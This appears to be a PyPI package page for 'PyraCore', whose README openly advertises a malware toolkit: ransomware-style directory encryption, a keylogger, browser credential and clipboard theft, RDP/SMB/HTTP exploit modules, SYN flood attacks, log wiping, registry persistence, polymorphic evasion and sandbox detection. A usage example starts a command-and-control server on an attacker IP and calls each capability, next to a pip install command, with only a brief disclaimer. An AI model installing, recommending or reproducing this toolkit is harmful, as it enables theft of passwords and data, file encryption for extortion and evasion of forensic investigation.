Uma biblioteca modular para operações avançadas em sistemas.
Project description
README.md for PyraCore
PyraCore
Introduction
PyraCore is a highly modular and robust Python library designed to facilitate the development of advanced tools for system, network, and security operations. Its power lies in its comprehensive set of features that enable sophisticated tasks with ease and efficiency.
Key Features
1. Advanced Encryption
- AES Encryption/Decryption: PyraCore provides secure AES encryption and decryption functions, ensuring data protection during transmission.
- File/Directory Operations: The library can encrypt and decrypt entire directories, making it useful for protecting sensitive files or implementing ransomware-like functionality.
2. Keylogger Functionality
- Monitors keystrokes in real-time and logs them to hidden files, allowing for the capture of sensitive information like passwords and credit card numbers.
3. Exploitation Capabilities
- Includes modules for exploiting vulnerabilities in protocols such as RDP, SMB, and HTTP, enabling penetration testing or malicious activities depending on the user's intent.
4. Information Gathering
- Extracts browser credentials, captures clipboard content, and steals system information (OS details, IP addresses, etc.), providing valuable insights into the target system.
5. Network Scanning and Attacks
- Performs SYN Flood attacks and scans networks for active hosts, facilitating network reconnaissance and potential denial-of-service attacks.
6. Anti-Forensics Techniques
- Deletes logs from the system to hinder forensic analysis, making it difficult to trace the actions performed by the library.
7. Persistence Mechanisms
- Adds the script to the Windows registry or startup folder to ensure it runs automatically upon system reboot, maintaining long-term access to the target system.
8. Polymorphic Code
- Generates dynamic code variations to evade detection by static analysis tools, increasing the stealthiness of the library's operations.
Installation
To install the PyraCore library, you can use pip:
pip install pyracore
Usage
Basic Example
Here's a basic example of how to use the library:
from pyracore.core.server import Server
from pyracore.modules.keylogger import Keylogger
from pyracore.modules.network import syn_flood, stop_syn_flood
from pyracore.modules.credentials import extract_browser_passwords
from pyracore.modules.file_operations import encrypt_directory, decrypt_directory
from pyracore.modules.system_info import steal_system_info
from pyracore.modules.clipboard import capture_clipboard
from pyracore.modules.anti_forensics import anti_forensics
from pyracore.sandbox_detection import is_sandbox
# Initialize the server C2
server = Server('192.168.1.102', 4444) # Change to your Kali Linux IP
server.accept_connections()
# Start the keylogger
keylogger = Keylogger()
keylogger.start()
# Execute an SYN flood attack
syn_flood("192.168.1.10", 80)
# Stop the SYN flood attack
stop_syn_flood()
# Extract browser credentials
creds = extract_browser_passwords()
print(creds)
# Encrypt a directory
encrypt_directory("/path/to/directory")
# Decrypt a directory
decrypt_directory("/path/to/directory")
# Capture clipboard content
clipboard_content = capture_clipboard()
print(clipboard_content)
# Steal system information
info = steal_system_info()
print(info)
# Perform anti-forensics actions
anti_forensics()
# Check if running in a sandbox environment
if is_sandbox():
print("Sandbox detected.")
# self_destruct()
Contribution
Contributions are welcome! If you want to improve or add new functionalities to PyraCore, follow these steps:
- Fork the repository.
- Create a branch for your contribution (
git checkout -b feature/nome-da-feature). - Make your changes and commit (
git commit -am 'Adiciona nova funcionalidade'). - Push to the branch (
git push origin feature/nome-da-feature). - Open a Pull Request on GitHub.
License
This project is licensed under the MIT License. This means you can use, modify, and distribute it freely, provided you maintain the original credits.
Contact
If you have any questions or need help, feel free to contact us at joaquimcarlostimoteo1@gmail.com.
Disclaimer
While PyraCore offers powerful functionalities for legitimate purposes like penetration testing and security research, its misuse can lead to severe consequences, both legally and ethically. It is essential to use this library responsibly and within the bounds of the law, adhering to ethical guidelines and obtaining proper authorization before conducting any operations. Always prioritize ethical considerations and legal compliance when utilizing advanced libraries like PyraCore.
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file pyracore-2.0.2.tar.gz.
File metadata
- Download URL: pyracore-2.0.2.tar.gz
- Upload date:
- Size: 11.1 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.1.0 CPython/3.9.6
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
154ea89cb0643a406156dac6472dac74d456cb14e12f62db9cc30e64ff6a05da
|
|
| MD5 |
7bdfc6c61aa23c703c738dc727461e3b
|
|
| BLAKE2b-256 |
8591e7ca73fc7753c55deda4cdfed06f7e0b3a135e4d779b2500ff94d1db6aee
|
File details
Details for the file pyracore-2.0.2-py3-none-any.whl.
File metadata
- Download URL: pyracore-2.0.2-py3-none-any.whl
- Upload date:
- Size: 11.3 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.1.0 CPython/3.9.6
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
ca57375f5d3adf580bf4eb97598f6dea0d1943e6b38750ae11557290250d69f2
|
|
| MD5 |
b13f34a384716bb0c339ec3c9eecd282
|
|
| BLAKE2b-256 |
de935a708dd6fbe42cac11337d9dd6dfa48c43d1f40aa743e545f521c42e2cd4
|